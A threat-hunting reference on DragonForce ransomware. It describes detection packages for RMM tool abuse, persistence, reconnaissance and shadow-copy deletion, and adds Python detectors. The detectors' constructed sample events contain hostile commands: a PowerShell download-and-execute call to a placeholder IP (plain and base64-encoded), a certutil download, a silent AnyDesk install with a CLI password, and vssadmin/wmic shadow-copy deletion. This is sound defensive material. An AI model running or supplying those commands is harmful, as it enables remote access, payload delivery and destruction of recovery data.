Threat Overview - DragonForce Ransomware
DragonForce ransomware is a malware strain that emerged in 2023 and operates under the Ransomware-as-a-Service (RaaS) model. The group behind it, operating under the same name, first gained attention with politically motivated attacks against targets chosen to fit its ideological agenda. Over time it pivoted to financially motivated extortion campaigns and has become a significant player in the ransomware sector. The operation is structured so that affiliates launch attacks using DragonForce's infrastructure and tooling, and the ransomware's customizable payloads let those affiliates target a wide range of industries. As a result, the variant has been associated with attacks worldwide, particularly against high-profile targets in the retail, financial, and manufacturing sectors across North America, Europe, and Asia.
DragonForce Ransomware Hunt Package Collection
TITAN References:
TITAN Info Report: Underground Perspective - Major UK retailers M&S, Co-op fall victim to cyberattacks
Related Hunt Packages
SplashTop RMM Command Line Install
This Threat Hunt package identifies attempts to install Splashtop Remote Monitoring and Management (RMM) software via command-line interfaces (CLI) or the Windows Installer (msiexec). Adversaries often use legitimate remote administration tools like Splashtop RMM to maintain persistent access to compromised systems, evade detection, and manage multiple infected machines.
Autorun or ASEP Registry Key Modification
A common method by which adversaries and malware alike achieve persistence is adding a program to the startup folder or referencing it from a Registry run key. An entry in the Registry "run keys" or in the startup folder causes the referenced program to execute when a user logs in. These locations are often used for legitimate purposes; when abused, however, the key name or value is frequently obviously suspicious, for example a random name, or an object loaded from a temp or public folder.
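The following is an added example of the heuristics described above applied to registry value-set telemetry; it is not the HUNTER package's query logic. It runs over a handful of constructed Sysmon Event ID 13-style records and flags writes to Run/RunOnce and Winlogon autostart locations whose value name looks machine-generated, whose data points into a temp or public folder, or whose data invokes a script host. The key list, folder list and randomness heuristic are assumptions for illustration and should be tuned to the environment.

```python
import re
from collections import namedtuple

# Registry value-set event in the shape of Sysmon Event ID 13 (Image, TargetObject, Details).
RegEvent = namedtuple("RegEvent", "image target_object details")

# Autostart locations (ASEPs) this example covers: the Run/RunOnce family and the
# Winlogon Shell/Userinit values. Other ASEPs exist; extend the pattern as needed.
ASEP_RE = re.compile(
    r"\\Microsoft\\Windows\\CurrentVersion\\(?:Run|RunOnce|RunOnceEx|RunServices|RunServicesOnce)\\"
    r"|\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\(?:Shell|Userinit)$",
    re.IGNORECASE,
)
# Folders a startup entry rarely points into legitimately (heuristic list, an assumption).
SUSPICIOUS_DIR_RE = re.compile(r"\\(?:Temp|Users\\Public|Downloads|\$Recycle\.Bin)\\", re.IGNORECASE)
# Script hosts and LOLBins that turn a run key into a loader for a dropped script.
LOADER_RE = re.compile(
    r"\b(?:wscript|cscript|mshta|powershell|pwsh|rundll32|regsvr32)(?:\.exe)?\b"
    r"|\.(?:vbs|js|jse|hta|ps1|bat|cmd)\b",
    re.IGNORECASE,
)


def looks_random(value_name):
    """Heuristic for machine-generated value names: 8+ alphanumerics with almost no
    vowels, or with digits mixed into the letters. Tune the thresholds to your data."""
    if not re.fullmatch(r"[A-Za-z0-9]{8,}", value_name):
        return False
    vowel_ratio = sum(c in "aeiouAEIOU" for c in value_name) / len(value_name)
    mixed = any(c.isdigit() for c in value_name) and any(c.isalpha() for c in value_name)
    return vowel_ratio < 0.2 or mixed


def inspect(event):
    """Return a finding for a write to an autostart location, or None if the key is not an
    ASEP. 'reasons' is empty when nothing about the write looks suspicious."""
    if not ASEP_RE.search(event.target_object):
        return None
    value_name = event.target_object.rsplit("\\", 1)[-1]
    reasons = []
    if SUSPICIOUS_DIR_RE.search(event.details):
        reasons.append("data points into a temp/public/download folder")
    if looks_random(value_name):
        reasons.append("random-looking value name")
    if LOADER_RE.search(event.details):
        reasons.append("script host or LOLBin in value data")
    return {"image": event.image, "value": value_name, "data": event.details, "reasons": reasons}


def hunt(events):
    """ASEP writes that carry at least one suspicion reason."""
    return [f for f in map(inspect, events) if f and f["reasons"]]


SAMPLE_EVENTS = [  # constructed records for this example, not real telemetry
    RegEvent(r"C:\Program Files\Vendor\setup.exe",
             r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
             r'"C:\Program Files\Vendor\agent.exe" --tray'),
    RegEvent(r"C:\Windows\System32\reg.exe",
             r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Kx7pq9mzt2",
             r"C:\Users\Public\svc.exe"),
    RegEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
             r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Update",
             r"wscript.exe //B C:\Users\bob\AppData\Local\Temp\upd.vbs"),
    RegEvent(r"C:\Windows\regedit.exe",
             r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
             r"C:\Windows\system32\userinit.exe,C:\Users\Public\helper.exe"),
    RegEvent(r"C:\Windows\System32\svchost.exe",
             r"HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate",
             "DWORD (0x00000001)"),
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["value"], "<-", finding["data"], "|", "; ".join(finding["reasons"]))
```

The vendor entry in the first record is written to the same Run key but produces no finding, which is the point: the hunt is on the shape of the value, not on the key alone. The Winlogon Userinit case shows why the data field matters even when the value name is the expected one: the appended second executable is what is suspicious.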
TeamViewer Service Installation - Potential Remote Management Tool Installation
This Hunt Package identifies the service that is created when TeamViewer is installed with its default service profile. Before executing it, analysts should verify, following internal guidance, whether TeamViewer is permitted in their environment.
DNS Query for TeamViewer Associated Domain by Non-Standard TeamViewer Process Name - Potential Defense Evasion
This Hunt Package uncovers potentially renamed instances of TeamViewer and other defense evasion techniques used to mask its presence. The query logic excludes the common process names associated with TeamViewer and looks for DNS requests to TeamViewer-associated domains from any other process. Before executing it, analysts should verify, following internal guidance, whether TeamViewer is permitted in their environment.
Active Directory Discovery and Reconnaissance - ADFind.exe Execution
This provided logic is designed to identify when ADFind.exe is executed with common flags and designations related to Active Directory enumeration and reconnaissance. Examples would be utilizing AdFind to enumerate users on a domain or enumerate administrators on a domain in an attempt to identify potential targets within the organization.
TeamViewer Execution from Abnormal Folder - Potential Malicious Use of RMM Tool
TeamViewer is a common and widely used tool for remotely controlling machines. Many actors have adopted it to remotely access victim machines and deploy additional malware or ransomware payloads. This Hunt Package excludes the common paths TeamViewer is executed from. Because TeamViewer can be installed or executed from nearly any directory, analysts should review whether TeamViewer is allowed and follow internal policy if it is not authorized. Common "red flag" directories include temporary directories (C:\Temp) and even System32. To appear more legitimate, some attackers also use installation paths with legitimate-sounding names, such as "Microsoft Management" or "Customer Service".
TeamViewer Binary File Write - Potential TeamViewer Installation or Usage
This Hunt Package identifies the files commonly written during a TeamViewer download or installation, which most organizations would treat as a policy violation. It is important to note which file corresponds to which stage: the setup file is written when TeamViewer is downloaded, while the service binary is written only after a successful installation. The desktop application is also written after setup, but not always, depending on the installation method chosen.
Atera Agent utilized for Unauthorized Remote Access
This package identifies when the Atera Agent is installed for remote connectivity by looking for the registry values or command-line arguments used to install the agent and register it to an unauthorized account. It uses several different artifacts to identify this behavior; check the 'Deployment Requirements' section for each tool to understand its limitations and requirements.
Potential UEFI Volume Tampering via BCDEdit Boot Configuration Changes
This Threat Hunt Package identifies process execution activity common to UEFI bootkit attacks, a class of malware that targets the motherboard's UEFI firmware. It focuses on the use of bcdedit, the command-line boot configuration tool, to detect changes to the system boot configuration, a common target of UEFI bootkits.
AnyDesk Silent Installation - Potential Malicious RMM Tool Installation
Identifies when AnyDesk is installed using the silent method, which shows no prompt or other details to the user logged into the system. Malware uses this to automate the installation without the user knowing it has been installed.
Remote Atera Agent Download - Command Line
This Threat Hunt package identifies when a download-capable living-off-the-land binary (LOLBin) is used to fetch the Atera Remote Monitoring and Management (RMM) agent directly from Atera's distribution domain.
Remote Atera Agent Download - Web
This Threat Hunt package identifies when the Atera Remote Monitoring and Management (RMM) agent is downloaded over the web directly from Atera's distribution domain.
Malicious PowerShell Process - Connect To Internet With Hidden Window
This use case identifies PowerShell processes started with parameters that modify the execution policy for the run, run in a hidden window, and connect to the Internet. This combination of command-line options is suspicious because it overrides the default PowerShell execution policy, hides the activity from the user, and reaches out to the Internet.
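The following is an added example of the three-condition check described above, written here for illustration and not taken from the HUNTER package. It goes slightly beyond the paragraph in two ways a practitioner would want: powershell.exe resolves switches by unique prefix, so the patterns accept every abbreviation of -WindowStyle and -ExecutionPolicy (plus the -ep alias), and the Internet indicators are also searched inside a decoded -EncodedCommand payload, where the download logic is usually hidden. The sample command lines and the payload are constructed; the indicator list is an assumption to be extended.

```python
import base64
import binascii
import re


def prefix_pattern(word, min_len):
    """Regex alternation of every abbreviation of `word` that is at least `min_len`
    characters long, longest first. powershell.exe accepts unique switch prefixes, so
    -w, -win and -windowstyle all select the same switch."""
    alts = "|".join(re.escape(word[:i]) for i in range(len(word), min_len - 1, -1))
    return "(?:" + alts + ")"


SWITCH = r"(?:^|\s)[-/]"
HIDDEN_RE = re.compile(SWITCH + prefix_pattern("windowstyle", 1) + r"\s+hidden\b", re.IGNORECASE)
# -ex... is the ExecutionPolicy prefix and -ep an explicit alias; a bare -e is EncodedCommand.
POLICY_RE = re.compile(
    SWITCH + "(?:" + prefix_pattern("executionpolicy", 2) + r"|ep)\s+(?:bypass|unrestricted)\b",
    re.IGNORECASE,
)
ENCODED_RE = re.compile(
    SWITCH + "(?:" + prefix_pattern("encodedcommand", 1) + r"|ec)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)
# Download/network indicators (assumed starter list, not exhaustive).
INTERNET_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|net\.webclient|downloadstring|"
    r"downloadfile|start-bitstransfer|\bcurl\b|\bwget\b|https?://",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline):
    """UTF-16LE payload behind -EncodedCommand (any abbreviation), or '' if absent or invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return ""


def assess(cmdline):
    """Evaluate one process command line against the three conditions of the hunt."""
    decoded = decode_encoded_command(cmdline)
    result = {
        "hidden_window": bool(HIDDEN_RE.search(cmdline)),
        "policy_override": bool(POLICY_RE.search(cmdline)),
        "internet": bool(INTERNET_RE.search(cmdline) or INTERNET_RE.search(decoded)),
        "decoded": decoded,
    }
    result["suspicious"] = result["hidden_window"] and result["policy_override"] and result["internet"]
    return result


def encode_command(script):
    """Build a -EncodedCommand argument the way a stager or obfuscator would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def hunt(cmdlines):
    return [c for c in cmdlines if assess(c)["suspicious"]]


PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"  # constructed
SAMPLES = [  # constructed command lines, not real telemetry
    'powershell.exe -nop -w hidden -ep bypass -c "' + PAYLOAD + '"',
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + encode_command(PAYLOAD),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    'powershell.exe -w hidden -c "Get-Process | Out-File C:\\temp\\p.txt"',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(assess(sample)["suspicious"], sample[:80])
```

The second sample is the case a plain string match misses: the visible command line contains no URL and no download cmdlet, and only the decoded payload satisfies the Internet condition. The third and fourth samples each satisfy a single condition and are left alone, which matches the package's intent of alerting on the combination rather than on any one flag.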
AnyDesk Password Set Via CLI - Potential Malicious RMM Tool Installation
Threat actors who install AnyDesk in the background and want a password they can log in with pipe the password into the AnyDesk binary with the --set-password flag, typically by echoing it. This Hunt Package identifies when a password is set for AnyDesk via the CLI. This is uncommon for most users, who configure the password in the UI rather than by running a command.
AnyDesk Service Installation - Potentially Malicious RMM Tool Installation
Identifies when the AnyDesk service is installed onto a system. This can be legitimate if the organization allows AnyDesk, however if it is not a commonly utilized application, any service installations should be considered suspect.
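Several of the RMM packages above (Splashtop via msiexec, AnyDesk silent installation and --set-password, the Atera agent download via a LOLBin and its registration to an unauthorized account, and TeamViewer executed from an abnormal folder) reduce to rules over process-creation events. The block below is an added example that implements those rules together over constructed Sysmon Event ID 1-style records; it is not the HUNTER package logic. The allowed TeamViewer folders, the approved Atera IntegratorLogin list, the LOLBin set and the Atera download hostname are assumptions for illustration; only the atera.com apex domain is matched.

```python
import re
from collections import namedtuple
from pathlib import PureWindowsPath

# Process-creation event: image path, full command line, parent image (Sysmon Event ID 1 shape).
ProcEvent = namedtuple("ProcEvent", "image cmdline parent")

# Folders where TeamViewer legitimately lives; anything else is "abnormal" (assumed policy).
TEAMVIEWER_ALLOWED_DIRS = ("c:\\program files\\teamviewer\\", "c:\\program files (x86)\\teamviewer\\")
# Atera integrator accounts the organisation actually uses (constructed allow-list).
ALLOWED_ATERA_INTEGRATORS = {"it@example.com"}
# Download-capable LOLBins (assumed starter list).
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe", "pwsh.exe", "wget.exe"}


def basename(path):
    return PureWindowsPath(path).name.lower()


def rule_splashtop_cli(e):
    if basename(e.image) == "msiexec.exe" and "splashtop" in e.cmdline.lower():
        return "Splashtop RMM installed via msiexec"


def rule_anydesk_silent(e):
    cl = e.cmdline.lower()
    if basename(e.image).startswith("anydesk") and "--install" in cl and "--silent" in cl:
        return "AnyDesk installed silently (--install with --silent)"


def rule_anydesk_password(e):
    cl = e.cmdline.lower()
    if "anydesk" in cl and "--set-password" in cl:
        return "AnyDesk unattended-access password set via CLI"


def rule_atera_download(e):
    if basename(e.image) in DOWNLOADERS and re.search(r"https?://[^\s\"'/]*\batera\.com\b", e.cmdline, re.I):
        return "Atera agent fetched with a download-capable LOLBin"


def rule_atera_unauthorized(e):
    # The MSI takes the account the agent enrols under as IntegratorLogin=...
    m = re.search(r"IntegratorLogin=([^\s\"]+)", e.cmdline, re.I)
    if m and m.group(1).lower() not in ALLOWED_ATERA_INTEGRATORS:
        return "Atera agent registered to unapproved account " + m.group(1)


def rule_teamviewer_path(e):
    name = basename(e.image)
    if name.startswith("teamviewer") and name.endswith(".exe"):
        folder = str(PureWindowsPath(e.image).parent).lower() + "\\"
        if not folder.startswith(TEAMVIEWER_ALLOWED_DIRS):
            return "TeamViewer executed from abnormal folder " + folder


RULES = [rule_splashtop_cli, rule_anydesk_silent, rule_anydesk_password,
         rule_atera_download, rule_atera_unauthorized, rule_teamviewer_path]


def hunt(events):
    """(rule name, image basename, reason) for every rule that fires on every event."""
    findings = []
    for e in events:
        for rule in RULES:
            reason = rule(e)
            if reason:
                findings.append((rule.__name__, basename(e.image), reason))
    return findings


SAMPLE_EVENTS = [  # constructed records, not real telemetry; the Atera download hostname is made up
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\Public\SplashtopStreamer.msi /qn", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Users\bob\Downloads\AnyDesk.exe",
              r'"C:\Users\bob\Downloads\AnyDesk.exe" --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c echo Str0ngPass! | "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --set-password',
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -urlcache -split -f https://agent-dist.atera.com/setup.msi C:\Users\Public\a.msi",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\Public\a.msi /qn IntegratorLogin=rmm@outsider.example CompanyId=4242",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\Temp\Microsoft Management\TeamViewer.exe",
              r'"C:\Windows\Temp\Microsoft Management\TeamViewer.exe"', r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Program Files\TeamViewer\TeamViewer.exe",
              r'"C:\Program Files\TeamViewer\TeamViewer.exe"', r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\bob\Downloads\AteraAgent.msi /qn IntegratorLogin=it@example.com CompanyId=17",
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for rule_name, image, reason in hunt(SAMPLE_EVENTS):
        print(rule_name, image, "->", reason)
```

The last two records are the sanctioned cases (TeamViewer from its normal install folder and an Atera agent enrolled to the approved account) and produce no findings, which is the tuning step every one of these packages asks for: decide up front which RMM tools and accounts are allowed, then alert on the rest. Note that the AnyDesk --set-password case is caught on the cmd.exe wrapper, since the echo pipe lives in its command line rather than in the AnyDesk process.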
Shadow Copies Deletion Using Operating Systems Utilities
Ransomware is known to delete Windows shadow copies before it begins encrypting data on the victim host. This is typically carried out with PowerShell, vssadmin.exe or wmic.exe. This package identifies activity by powershell, wmic, vssadmin or vssvc with command-line arguments containing delete and variations of shadow.
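The block below is an added example, not the HUNTER package logic, of the "delete plus a variation of shadow" check run over constructed process events. It goes a little beyond the paragraph in two ways: it normalises away the cmd.exe caret escape and quoting that break naive substring matches on the cmd.exe wrapper's command line, and it adds the vssadmin resize shadowstorage form, which forces deletion of existing copies without the word delete appearing. It also shows why the two tokens should be tied to the actual shadow-copy object rather than matched anywhere: a PowerShell command that merely mentions a file named delete.txt under a folder named shadow does not fire. The process list and patterns are assumptions to be tuned.

```python
import re
from pathlib import PureWindowsPath

# Images whose command line is inspected; cmd.exe is included so wrapped/escaped forms are caught.
SHADOW_PROCESSES = {"vssadmin.exe", "wmic.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}

# (technique label, regex over the normalised command line). Each pattern ties the verb to the
# shadow-copy object so unrelated uses of the words "delete" and "shadow" do not match.
SHADOW_PATTERNS = [
    ("vssadmin delete shadows",
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b")),
    ("vssadmin resize shadowstorage (forces deletion)",
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bresize\s+shadowstorage\b")),
    ("wmic shadowcopy delete",
     re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b")),
    ("powershell Win32_ShadowCopy removal",
     re.compile(r"win32_shadowcopy.*(?:\.delete\(\)|remove-wmiobject|remove-ciminstance)")),
]


def normalise(cmdline):
    """Fold case, drop the cmd.exe escape caret and quotes, and collapse whitespace, so
    'vss^admin  "delete" sha^dows' matches the same pattern as the plain form."""
    s = cmdline.lower().replace("^", "").replace('"', "")
    return re.sub(r"\s+", " ", s).strip()


def classify(image, cmdline):
    """Technique label if the command deletes (or forces deletion of) shadow copies, else None."""
    if PureWindowsPath(image).name.lower() not in SHADOW_PROCESSES:
        return None
    norm = normalise(cmdline)
    for label, pattern in SHADOW_PATTERNS:
        if pattern.search(norm):
            return label
    return None


def hunt(events):
    """(image basename, technique) for each event that matches."""
    findings = []
    for image, cmdline in events:
        label = classify(image, cmdline)
        if label:
            findings.append((PureWindowsPath(image).name, label))
    return findings


SAMPLES = [  # constructed command lines, not real telemetry
    (r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    (r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB"),
    (r"C:\Windows\System32\wbem\WMIC.exe", "wmic.exe shadowcopy delete"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell.exe -c "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete()}"'),
    (r"C:\Windows\System32\cmd.exe", "cmd.exe /c vss^admin delete sha^dows /all /quiet"),
    (r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe list shadows"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell.exe -c "Remove-Item C:\shadow\delete.txt"'),
]

if __name__ == "__main__":
    for image, label in hunt(SAMPLES):
        print(image, "->", label)
```

The caret-escaped sample only exists on the cmd.exe event: by the time vssadmin.exe itself starts, cmd.exe has already stripped the carets, so the child's command line is clean. Hunting both the wrapper and the child costs little and covers operators who log only one of the two.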